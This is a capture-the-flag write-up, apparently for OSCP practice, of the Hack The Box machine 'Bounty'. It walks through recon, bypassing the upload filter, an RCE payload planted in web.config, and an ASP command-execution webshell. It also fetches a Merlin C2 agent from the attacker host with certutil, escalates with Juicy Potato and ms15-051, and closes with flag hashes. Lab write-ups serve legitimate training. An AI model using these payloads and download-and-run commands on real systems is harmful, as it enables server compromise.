Windows Boxes

bounty

  1. nmap
  2. http
    1. gobuster
      1. transfer.aspx
  3. file extension spraying with burpsuite's intruder
    1. intruder extension bruteforce
  4. web.config for RCE
    1. upload web.config
  5. simple aspx command
    1. burp
      1. swap in shells.aspx
      2. ping myself
  6. root through MERLIN
    1. merlin dl
      1. create x509 cert
      2. run merlin
      3. compile merlin agent
        1. default agent w/o params builds for linux
      4. upload agent.exe to victim
      5. if you need to kill merlin:
      6. certutil agent
        1. run agent
    2. merlin
      1. info
      2. powerup
      3. whoami priv
    3. juicy potato
      1. upload with merlin
  7. root through ms15-051 and NC
    1. msf port listener
    2. upload file
    3. upload ms015-051 and NC64.exe
    4. privesc
  8. usr/root
  9. Lessons Learned

bounty

images/271-1.png
images/271-2.png

nmap

nmap -sV -sC -oA bounty 10.10.10.93
images/273-1.png
only port that's open is 80 running ISS httpd 7.5

http

images/525-1.png
images/525-2.png

gobuster

gobuster dir -w /usr/share/wordlists/dirbustser/directory-list -x aspx -u 10.10.10.93
images/274-1.png

images/274-2.png
Transfer.aspx worth noting

transfer.aspx

transfer.aspx has an upload button! lets see if we can take advantage of it
images/276-1.png

lets try uploading a simple text file
images/276-2.png

file extension spraying with burpsuite's intruder

here we're going to find out which extensions from this list are acceptable upload formats for bounty

images/280-1.png

we'll test which extensions the webserver will accept with burpsuite's intruder:

to add a variable we can brute force, use the images/280-2.png button
images/280-3.png

images/280-4.png

intruder extension bruteforce

we'll paste the extension list into intruder's payload options
images/282-1.png
images/282-2.png


Looking intruder's response lengths, we see one filetype that's response is different than the others
images/282-3.png
A closer look confirms Config files are accepted images/282-4.png

web.config for RCE

https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/
images/275-1.png

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
' it is running the ASP code if you can see 3 by opening the web.config file!
Response.write(1+2)
Response.write("<!-"&"-")
%>
-->

upload web.config

images/278-1.png

since gobuster discovered an /UploadedFiles directory, lets see if our web.config got uploaded there
images/278-2.png
' it is running the ASP code if you can see 3 by opening the web.config file! We have code execution!
Response.write(1+2)

simple aspx command

now that we know we have code execution, lets see if we can inject something a little more sinister than a math function
images/284-1.png

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("")
o = cmd.StdOut.Readall()
Response.write(o)
%>

burp

images/285-1.png

swap in shells.aspx

<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->
images/286-1.png

images/286-2.png


unfortunately, our Response.write(o) call, which should output whoami's resoonse, is not getting run
images/286-3.png

ping myself

<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c ping 10.10.14.62")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->

images/288-1.png
images/288-2.png

root through MERLIN

merlin dl

images/287-1.png

create x509 cert

openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=stefano.rocks" -days 7

images/290-1.png

run merlin

go run cmd/merlinserver/main.go -i 10.10.14.62
images/292-1.png
images/292-2.png

compile merlin agent

images/291-1.png

This changes the default URL in the binary for windows

images/291-2.png

images/291-3.png

default agent w/o params builds for linux

go build -ldflags "-X main.url=https://10.10.14.62:433" -o test.exe main.go
images/293-1.png

file test.exe
images/293-2.png

upload agent.exe to victim

images/294-1.png

images/294-2.png

if you need to kill merlin:

netstat -alnp | grep 443

find which port 127.0.0.1:443 is listening on

kill <processID>
kill -9 <processID>

certutil agent

“certutil -urlcache -split -f http://10.10.14.62/agent.exe C:\\users\\public\\agent.exe"

images/296-1.png

run agent

images/289-1.png

images/289-2.png
images/289-3.png

merlin

info
powerup
whoami /priv

info

images/298-1.png

powerup

images/299-1.png
images/299-2.png
images/299-3.png
images/299-4.png
images/299-5.png

whoami priv

images/300-1.png

big find images/300-2.png

juicy potato

juicy potato abuses the SeImpersonatePrivilege Feature
images/301-1.png

upload with merlin

images/302-1.png
images/302-2.png


to run juicy potato:
./jp.exe -t * -p c:\users\public\agent.exe -l 9001
images/302-3.png
images/302-4.png

root through ms15-051 and NC

msf port listener

msfconsole -r unicorn -rc

upload file

images/309-1.pngimages/309-2.png


and we have our foothold!
images/309-3.png

upload ms015-051 and NC64.exe

images/305-1.png
images/305-2.png

images/305-3.png

privesc

images/306-1.png

images/306-2.png

and we're system!
images/306-3.png

usr/root

images/311-1.png
e29ad89891462e0b09741e3082f44a2f

images/311-2.png
c837f7b699feef5475a0c079f9d4f5ea

Lessons Learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/
images/1453-1.png